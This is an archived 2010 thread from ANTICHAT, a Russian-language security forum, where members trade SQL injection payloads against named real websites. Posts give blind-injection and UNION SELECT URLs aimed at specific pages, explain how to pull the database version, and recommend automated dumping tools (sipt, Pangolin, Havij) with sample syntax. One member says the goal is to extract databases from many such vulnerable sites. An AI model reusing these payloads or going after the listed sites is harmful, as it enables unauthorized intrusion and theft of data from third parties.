ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.11.2010, 14:10
|
|
Новичок
Регистрация: 21.09.2010
Сообщений: 9
Провел на форуме:
2142
Репутация:
6
|
|
Сообщение от None
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/home/cpsam/public_html/index.php on line 13
?????
|
|
|
02.11.2010, 14:32
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944
Репутация:
37
|
|
Сообщение от -PRIVAT-
Нету ничего.
Это blind скуля..
http://www.cps.am/en/strategy-and-politics/9+and+mid(version(),1,1)=5
|
|
|
|
02.11.2010, 15:07
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479
Репутация:
0
|
|
Имеем вот такую штуку например. Куда крутить?
Сообщение от None
http://shekinahministry.org/contentMain2.php?category_id=2&articleID=22-999.9+union+select+1,2,3,4--
|
|
|
|
02.11.2010, 15:10
|
|
Участник форума
Регистрация: 01.08.2009
Сообщений: 169
Провел на форуме:
1353033
Репутация:
113
|
|
Сообщение от DCrypt
Имеем вот такую штуку например. Куда крутить?
Крути сюда
Сообщение от None
http://shekinahministry.org/contentMain2.php?category_id=2&articleID=22-999.9+union+select+version%28%29,2,3,4--
|
|
|
|
02.11.2010, 15:11
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095
Репутация:
34
|
|
Сообщение от DCrypt
Имеем вот такую штуку например. Куда крутить?
А в чём вопрос то? Вывод есть ... бери статью по sql inj и крути...
|
|
|
|
02.11.2010, 15:12
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479
Репутация:
0
|
|
А есть тулза какая нить автоматизации процесса? Базы выдирать нужно. А такого вида телег полно.
|
|
|
|
02.11.2010, 15:17
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
sipt; pangolin;
|
|
|
|
02.11.2010, 15:29
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479
Репутация:
0
|
|
Сообщение от pinch
sipt; pangolin;
Я юзаю Havij 1.12 Pro.
Вот например вставляю:
Сообщение от None
http://www.corpwatch.org/article.php?id=14997-999.9+union+select+1,2,3,4--
Сообщение от None
Cannot find column count!
Target Not Vulnerable
It seems that input parameter is not effective! Check the following:
Are you sure input parameter really exist?!
Are you sure the input value '14997' is valid?
Are you sure the 'GET' method is correct?
Настройки:
|
|
|
|
02.11.2010, 16:37
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
Сообщение от None
http://www.corpwatch.org/article.php?id=14997-999.9+union+select+1,2,3,4--
c чего ты взял что здесь инъекция...
|
|
|
|
02.11.2010, 16:43
|
|
Новичок
Регистрация: 25.11.2009
Сообщений: 0
Провел на форуме:
68379
Репутация:
0
|
|
SQL Checker'ом прогнал и доволен) Он много мусора выдает. Надо все ручками проверять.
А в Havij'е эти вещи делаются так:
Target: http://www.corpwatch.org/article.php?id=14997
Syntax: 14997-999.9+union+select+1,%String_Col%,3,4--
%String_Col% - поле вывода.
Ну и Data Base иногда желательно самому выбрать, а то Havij тупить начинает.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
